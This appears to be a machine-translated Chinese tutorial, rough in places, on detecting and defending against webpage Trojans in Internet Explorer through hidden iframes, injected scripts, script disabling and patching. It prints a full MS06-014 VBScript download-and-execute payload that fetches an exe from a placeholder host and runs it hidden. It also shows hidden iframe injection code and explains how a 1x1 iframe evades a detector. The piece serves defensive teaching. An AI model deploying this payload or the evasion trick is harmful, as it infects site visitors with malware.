Anti-hacker intrusion protection (2)

By New4 [D.S.T]

Article 1: http://www.bkjia.com/Article/201201/117514.html


You can learn from this article:
 
1. How to identify whether a webpage has Trojans
 
2. How to correctly handle IE vulnerabilities in the system
 
Ii. Protection against webpage Trojan intrusion
When you see the title of this chapter, you may think like this: "What? Webpage Trojan intrusion! Who will protect us from the security of our online browsing websites (surfing)? "You don't have to worry about these concerns, because after reading this part of the document, you can basically boldly explore the Internet ).
Here we use four methods: the first is to identify the use of hidden frameworks to call htm, the second is to identify the use of redirection to any call of htm, js, and the third is to defend against web Trojans. I only use IE and the fourth is IE vulnerability repair and opinions; let GO!
 
Using hidden frameworks to call htm
Using a hidden frame to link to a webpage Trojan is actually using the HTML webpage language to create a box that is invisible to the naked eye, and then hiding the webpage Trojan address in the background, attackers execute malicious code (the code used by the vulnerability ). Let's briefly analyze the common webpage Trojan code, which should be clear in HTML: <iframe src = http://www.xxxx.com/muma.htm width = 0 height = 0> </iframe> is actually a box with width and height 0, of course, you can't see it, this allows you to hide and open a webpage containing malicious code (that is, a webpage Trojan) in the background, planting a backdoor, remotely controlling information theft, or destroying disk files ....... We can use a web Trojan guard software for defense. For example, if the website we want to access is http://www.darkteam.cn, enter an address in the software view page option to view the home page of the website (that is: home page) (1) we can see that the website page we are visiting should be normal! Now let's see what is prompted on a page that is not normal! (2) Check the prompt: "The webpage has invisible forms and Trojans. Be careful !" I don't need to say what you have to do. Attack the virus! (This software judgment standard is <iframe src = http: // width = 0 height = 0> </iframe> if it meets the requirements, the system prompts that an invisible form exists, software defects that can be regarded as a BUG <iframe src = http://www.xxxx.com/muma.htm width = 1 height = 1> </iframe> to change the width and height of the check failed (3) mentally retarded! You still have to rely on yourself at the crucial moment ...... As for software problems, I don't want to talk much about it because I didn't write it. If I have the ability, I can report it to the author and ask him to update or write a program. Here we will continue to use this software for manual judgment .)
We can determine that the keyword to be viewed by the code is "<iframe src = http: // any address (or any address) width = 0 height = 0> </iframe> winth = 0 to 10 height = 0 to 10, it must also be determined that the code is valid between <iframe </iframe>. "The code can be seen at the bottom of the web page in the <webpage source code> of the software.
 
Figure 1 check the default homepage of the site



Figure 2 pages with malicious code


 
Figure 3 mutating malicious code page easily avoids detection
 
Handler identifies htm and js that use redirection to any call
This type of call is difficult to check, but the usage is still not very high. Check the homepage of webpage Trojan guard and check whether this code exists? "<Script language = javascript src = http: // any file. js or any file. js> </script> "(4) this type of check is difficult, so it is difficult to call the JavaScript code normally. The abnormal malicious code is in JS rather than the homepage. We only need to download this JS and check it (you can use download tools such as thunder and batch download back for check )....... The malicious code features in JS files are basically the same as those on the HTM homepage. The Code is as follows: "document. write ("<iframe src = http: // any address (or/any address) width = 0 height = 0> </iframe> "); "winth = 0 to 10, height = 0 to 10, must be between <iframe </iframe>.


 
Figure 4 normal JS call behavior
 
You can check whether these typical codes exist for webpage Trojans:
Malicious Code of the MS06014 webpage Trojan: (there are many webpage Trojan codes, but they cannot work for IE6.0 or patched systems !)
 
<Html>
<Script language = "VBScript"> to call a VBScript, you only need to disable this script to prevent many web Trojans!
On error resume next
Dl = "http: // www. *****. com/go.exe" Download Trojan address
Set df = document. createElement ("object ")
Df. setAttribute "classid", "clsid: BD96C556-65A3-11D0-983A-00C04FC29E36"
Str = "Microsoft. XMLHTTP"
Set x = df. CreateObject (str ,"")
A1 = "Ado"
A2 = "db ."
A3 = "Str"
A4 = "eam"
Str1 = a1 & a2 & a3 & a4
Str5 = str1
Set S = df. createobject (str5 ,"")
S. type = 1
Str6 = "GET"
X. Open str6, dl, False
X. Send
Fname1 = "g0ld.com"
Set F = df. createobject ("Scripting. FileSystemObject ","")
Set tmp = F. GetSpecialFolder (2)
Fname1 = F. BuildPath (tmp, fname1)
S. open
S. write x. responseBody
S. savetofile fname1, 2
S. close
Set Q = df. createobject ("Shell. Application ","")
Q. ShellExecute fname1, "", "", "open", 0
</Script>
<Head>
<Title> Oh, my god! </Title> the information displayed on the top title bar.
</Head> <body>
<Center> You DO it! </Center> text information displayed
</Body> From the code above, we can see that the webpage is basically an HTML static page, but it does not rule out the webpage Trojan of ASP. The two methods we introduced earlier are the method to defend against webpage Trojans, which is commonly referred to as "Trojan", which is frequently used by many small hackers, but what if it is the malicious code used by the Vulnerability itself? We are not ...... No way? Okay. Now let's go to anti-webpage Trojan!
 
Defender defends against web Trojans. I only use IE.
Here, we will introduce the method in IE6.0, a Common Browser:
Disable scripts: Enable internet Options of IE> Security> Custom Level. Go to the script> java Applet and disable the script. (5)



Figure 5 modify IE to disable javascript scripts
Of course, you can also disable VBScript. In the script project, you can select to disable it. Click [Reset] to take effect and click OK to exit. Of course, you can set the security level to a high level (5 ). Note: disabling the script will cause a lot of unexpected troubles, because most websites will use it. For beautification or animation effects, you need to call a script to implement them.
.
Disable (iframe) Hide the framework call file: The method is basically the same as the above disabled script! (6) Of course, you can set the security level to high (5 circles)



 
Figure 6 select Disabled
 
How to fix and comment on IE Vulnerabilities
Disabling the script will lead to abnormal browsing or many abnormal problems on the page. It is not recommended to use it! Microsoft will release corresponding patches for the IE vulnerabilities exploited by web Trojans. We only need to complete the patches to reduce the possibility of winning! Of course, you can also use browsers with non-IE kernels, such as Mozilla firefoxfirefox (7) and operabrowser (8, no matter which browser is used, it is necessary to update the software immediately and install patches for Software defects!



 
Figure 7 Firefox

 
Figure 8Opera Browser
 
Summary: although there are a lot of web Trojans, as long as we have some methods, we can still greatly reduce the chance of winning! (Tools: webpage Trojan guard can be found at http://www.bkjia.com/soft)